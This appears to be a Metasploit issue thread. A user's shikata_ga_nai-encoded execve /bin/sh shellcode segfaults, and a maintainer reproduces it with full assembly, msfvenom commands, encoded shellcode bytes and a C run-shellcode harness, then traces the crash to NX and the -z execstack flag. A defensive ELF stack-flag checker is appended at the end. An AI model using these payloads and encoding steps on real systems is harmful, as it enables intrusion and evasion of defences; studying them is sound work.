Hello sir :)
This is just an experiment: can I encode the shellcode that I created? For example, I use an encoder, e.g. shikata_ga_nai, for encoding my shellcode:
msfvenom -e x86/shikata_ga_nai -i 5 -a x86 --platform linux <shellcode_binary> R | hexdump -v -e '"\\\x" 1/1 "%02x"'
Result after encoding:
\xbd\x7f\x94\x6d\xcc\xda\xc5\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x1c\x83\xe8\xfc\x31\x68\x0e\x03\x17\x9a\x8f\x39\x3c\x6b\x96\xb6\xe6\x98\x91\x93\x99\xcf\x81\x80\x56\xd9\xf7\x22\xa9\x9a\xef\xcf\x22\xe0\x13\x93\x04\x84\x4e\xcf\x03\x75\x20\x40\x87\xbc\xf5\x5a\x41\x0d\x36\x75\x32\x7a\xfd\xa2\x79\xec\xe4\xf4\xd8\x67\x9b\xb0\xbe\x4d\xd3\x06\xb0\x9d\x40\x10\x42\x8f\x47\xf5\x55\xa6\xae\xa6\xbe\x80\x47\xd0\x27\x98\xc5\x3d\x77\xd5\x36\xe9\xe4\x92\x64\x97\xb9\x37\xce\x91\x8c\x08\x4c\x7d\xcd\x78\xf7\x50\xe5\xb2\x6d\x4d\xa8\xaf\x76\x4b\x5d\x61\xc3\xbf
The shellcode has been tested, but I got Segmentation fault (core dumped), so is there any documentation or solution?
Thanks
I'm not one of the Metasploit devs, but you should be able to; I've done it many times before. @cskcsk
@cskcsk Hi, thank you for reporting. Could you please provide your shellcode before it was encoded?
Shellcode:
global _start
section .text
_start:
    push byte 11          ; eax = 11, the execve syscall number on 32-bit Linux
    pop eax
    xor edx, edx          ; edx = 0: NUL terminator for the string, later envp
    push edx
    push 0x68732f2f       ; "//sh" (little-endian)
    push 0x6e69622f       ; "/bin"
    mov ebx, esp          ; ebx = pointer to "/bin//sh"
    push edx              ; argv[1] = NULL
    push ebx              ; argv[0] = "/bin//sh"
    mov ecx, esp          ; ecx = argv
    int 0x80              ; execve("/bin//sh", argv, NULL)
Not sure why you need an encoder when you don't seem to have badchars to encode for.
Your invocation for msfvenom is wrong, I think. Looks like you're using the old msfpayload syntax.
How are you using the encoded shellcode?
I have no problem with generating an ELF from your shellcode and shikata_ga_nai. If you're hitting a segfault while using a shellcode harness, maybe you're hitting NX/DEP. Try compiling with -z execstack.
wvu@hiigara:~/metasploit-framework:master$ cat > shellcode.asm
global _start
section .text
_start:
push byte 11
pop eax
xor edx, edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push edx
push ebx
mov ecx, esp
int 0x80
wvu@hiigara:~/metasploit-framework:master$ nasm -f elf shellcode.asm
wvu@hiigara:~/metasploit-framework:master$ ld shellcode.o -o shellcode -m elf_i386
wvu@hiigara:~/metasploit-framework:master$ ./shellcode
$
wvu@hiigara:~/metasploit-framework:master$
wvu@hiigara:~/metasploit-framework:master$ objcopy --dump-section .text=shellcode.bin shellcode
wvu@hiigara:~/metasploit-framework:master$ rm shellcode
wvu@hiigara:~/metasploit-framework:master$ ./msfvenom -a x86 --platform linux -e x86/shikata_ga_nai -i 5 -f elf -o shellcode < shellcode.bin
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 51 (iteration=0)
x86/shikata_ga_nai succeeded with size 78 (iteration=1)
x86/shikata_ga_nai succeeded with size 105 (iteration=2)
x86/shikata_ga_nai succeeded with size 132 (iteration=3)
x86/shikata_ga_nai succeeded with size 159 (iteration=4)
x86/shikata_ga_nai chosen with final size 159
Payload size: 159 bytes
Final size of elf file: 243 bytes
Saved as: shellcode
wvu@hiigara:~/metasploit-framework:master$ chmod +x shellcode
wvu@hiigara:~/metasploit-framework:master$ ./shellcode
$
wvu@hiigara:~/metasploit-framework:master$
Yeah, check your harness or exploit. Bypass any mitigations. Let me know if I should reopen this.
I guess I already answered this before.
wvu@hiigara:~/metasploit-framework:master$ ./msfvenom -a x86 --platform linux -e x86/shikata_ga_nai -i 5 -f c < shellcode.bin >> harness.c
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 51 (iteration=0)
x86/shikata_ga_nai succeeded with size 78 (iteration=1)
x86/shikata_ga_nai succeeded with size 105 (iteration=2)
x86/shikata_ga_nai succeeded with size 132 (iteration=3)
x86/shikata_ga_nai succeeded with size 159 (iteration=4)
x86/shikata_ga_nai chosen with final size 159
Payload size: 159 bytes
Final size of c file: 693 bytes
wvu@hiigara:~/metasploit-framework:master$ vi harness.c
wvu@hiigara:~/metasploit-framework:master$ cat harness.c
#include <stdio.h>
#include <string.h>
int main(void)
{
char buf[] =
"\xdb\xc9\xd9\x74\x24\xf4\x5b\xb8\xbe\xc2\x11\xfa\x2b\xc9\xb1"
"\x22\x83\xeb\xfc\x31\x43\x13\x03\xfd\xd1\xf3\x0f\xdb\x13\x2a"
"\x9b\xff\x6f\x76\x1d\x27\x64\x27\x86\xfe\xb2\x89\x2c\x83\xad"
"\x16\x63\xdb\x39\xe4\xdc\xb6\x7b\xf4\xca\xab\x1f\xc1\x61\x0a"
"\xad\x02\xac\xbd\xab\x1e\x57\x0d\x63\x30\x62\xe8\x87\x6b\x99"
"\xff\xb9\x10\xbd\x7e\xd9\x92\xdc\xde\x40\x2a\xc3\x94\x06\x31"
"\x42\xe2\xb3\x15\x97\x21\x37\x5a\x5c\x6a\xe4\x8e\x56\xb6\x74"
"\x0c\x1c\x41\xd0\x76\xbe\xb1\x61\x27\x6f\x10\x0b\x09\x61\x32"
"\xef\x0e\xf4\x98\xae\xb0\xef\x6a\x9f\x13\x74\xa2\x70\x0c\x2a"
"\x62\x0a\xec\x16\x9a\xdc\x1b\x7a\x1b\xfc\xa4\x5d\x5c\xe9\x74"
"\x4f\x7b\xa9\x67\x4e\xd8\xa3\x2e\xc3";
printf("Shellcode Length: %d\n", strlen(buf));
int (*ret)() = (int(*)())buf;
return ret();
}
wvu@hiigara:~/metasploit-framework:master$ gcc harness.c -o harness -m32
wvu@hiigara:~/metasploit-framework:master$ ./harness
Shellcode Length: 159
Segmentation fault
wvu@hiigara:~/metasploit-framework:master$ gcc harness.c -o harness -m32 -z execstack
wvu@hiigara:~/metasploit-framework:master$ ./harness
Shellcode Length: 159
$
wvu@hiigara:~/metasploit-framework:master$
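The only difference between the segfaulting harness and the working one above is the `-z execstack` link flag, which sets the executable bit on the ELF's PT_GNU_STACK program header. The following is an added audit helper, not code from this issue or from Metasploit, that reads that header from a file (or from a constructed in-memory image) and reports whether the binary asks the loader for an executable stack; it assumes Linux with glibc's `<elf.h>`.

```c
#include <elf.h>
#include <stdio.h>
#include <string.h>

/* Scan program headers of either ELF class. Returns 1 = executable stack
 * (what -z execstack requests), 0 = NX stack, -1 = absent/malformed. */
#define SCAN_PHDRS(Ehdr, Phdr) do {                                         \
        Ehdr eh; Phdr ph;                                                   \
        if (len < sizeof eh) return -1;                                     \
        memcpy(&eh, img, sizeof eh);                                        \
        for (unsigned i = 0; i < eh.e_phnum; i++) {                         \
            size_t off = (size_t)eh.e_phoff + (size_t)i * eh.e_phentsize;   \
            if (off + sizeof ph > len) return -1;                           \
            memcpy(&ph, img + off, sizeof ph);                              \
            if (ph.p_type == PT_GNU_STACK) return (ph.p_flags & PF_X) ? 1 : 0; \
        }                                                                   \
        return -1; } while (0)

int elf_stack_executable(const unsigned char *img, size_t len)
{
    if (len < EI_NIDENT || memcmp(img, ELFMAG, SELFMAG) != 0) return -1;
    if (img[EI_CLASS] == ELFCLASS32) SCAN_PHDRS(Elf32_Ehdr, Elf32_Phdr);
    if (img[EI_CLASS] == ELFCLASS64) SCAN_PHDRS(Elf64_Ehdr, Elf64_Phdr);
    return -1;   /* unknown ELF class */
}

/* Constructed sample (not a real binary): a minimal ELF32 image whose only
 * program header is PT_GNU_STACK with the given flags, fed to the checker. */
int check_constructed_elf32(unsigned flags)
{
    unsigned char img[sizeof(Elf32_Ehdr) + sizeof(Elf32_Phdr)] = {0};
    Elf32_Ehdr eh = {0}; Elf32_Phdr ph = {0};
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS32;
    eh.e_phoff = sizeof eh; eh.e_phentsize = sizeof ph; eh.e_phnum = 1;
    ph.p_type = PT_GNU_STACK; ph.p_flags = flags;
    memcpy(img, &eh, sizeof eh); memcpy(img + sizeof eh, &ph, sizeof ph);
    return elf_stack_executable(img, sizeof img);
}

int main(int argc, char **argv)
{
    static unsigned char img[1 << 20];   /* headers sit near the front of the file */
    FILE *f = argc == 2 ? fopen(argv[1], "rb") : NULL;
    if (!f) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 2; }
    int r = elf_stack_executable(img, fread(img, 1, sizeof img, f));
    fclose(f);
    printf("%s: stack %s\n", argv[1], r == 1 ? "EXECUTABLE (-z execstack)"
           : r == 0 ? "non-executable" : "unknown (no PT_GNU_STACK)");
    return r == 1;
}
```

Run it against the two `harness` builds from the transcript above: the one linked with `-z execstack` reports an executable stack, the default build reports NX, which is why only the first one can jump into a stack buffer.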